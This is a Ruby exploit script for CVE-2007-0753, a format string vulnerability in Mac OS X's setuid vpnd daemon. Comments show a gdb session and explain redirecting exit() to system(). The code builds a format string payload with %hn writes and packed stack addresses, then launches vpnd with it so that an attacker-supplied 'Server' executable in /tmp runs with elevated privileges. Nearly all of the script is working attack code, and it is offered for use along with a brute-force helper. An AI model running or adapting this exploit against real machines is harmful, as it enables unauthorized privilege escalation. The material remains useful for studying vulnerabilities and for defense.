#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# CVE-ID: CVE-2007-0753 - http://docs.info.apple.com/article.html?artnum=305530
#
# /Library/Preferences/SystemConfiguration/com.apple.RemoteAccessServers.plist is required
#
# Note that com.apple.RemoteAccessServers.plist is only present by default on Mac OS X Server. 
# On a standard Mac OS X install, the file must be created manually or by using the graphical 
# network configuration tools.
# 
# Hrmm... NX is just about worthless on OSX. 
#
# We overwrite the saved eip in exit() with the address of system()
#
# Breakpoint 1, 0x90010a44 in exit ()
# (gdb) i f
# Stack level 0, frame at 0xbffffba0:
#  eip = 0x90010a44 in exit; saved eip 0x2ba9
#  called by frame at 0xbffffbc0
#  Arglist at 0xbffffb98, args: 
#  Locals at 0xbffffb98, Previous frame's sp is 0xbffffba0
#  Saved registers:
#   ebx at 0xbffffb94, ebp at 0xbffffb98, eip at 0xbffffb9c
#
# Because of the fixed string located just before our user input we wind up executing system("Server")
# 007-05-26 00:47:28 EDT Server <passed args> starting...
#
# We simply export our path to include /tmp and supply our own executable nastieness see brute.rb

# This moves a bit so brute that shit 
eip 		= 0xbffffb00+ARGV[0].to_i
filler 		= 0x41424344  
	
offset 		= 524

# This address WILL change... tested on fully patched pre 2007-005 Update 
# (gdb) p system   
# $1 = {<text variable, no debug info>} 0x90047800 <system>
#
# 7800 is 30691
# 904 is 6147 

formatstr		= "%.30691d^%" + offset.to_s + '$' + "hn" + "%6147.d^%"  + (offset+1).to_s + '$' + "hn" +
			  "^%" + (offset+2).to_s + '$' + "hx" + "^%"  + (offset+3).to_s + '$' + "hx"	

command_line    = "."
	
command_line << [eip].pack("V") 
command_line << [(eip+2)].pack("V")

command_line << [filler].pack("V") 
command_line << [(filler+2)].pack("V")
command_line << formatstr 

exec "/usr/sbin/vpnd", "-n", "-i", command_line

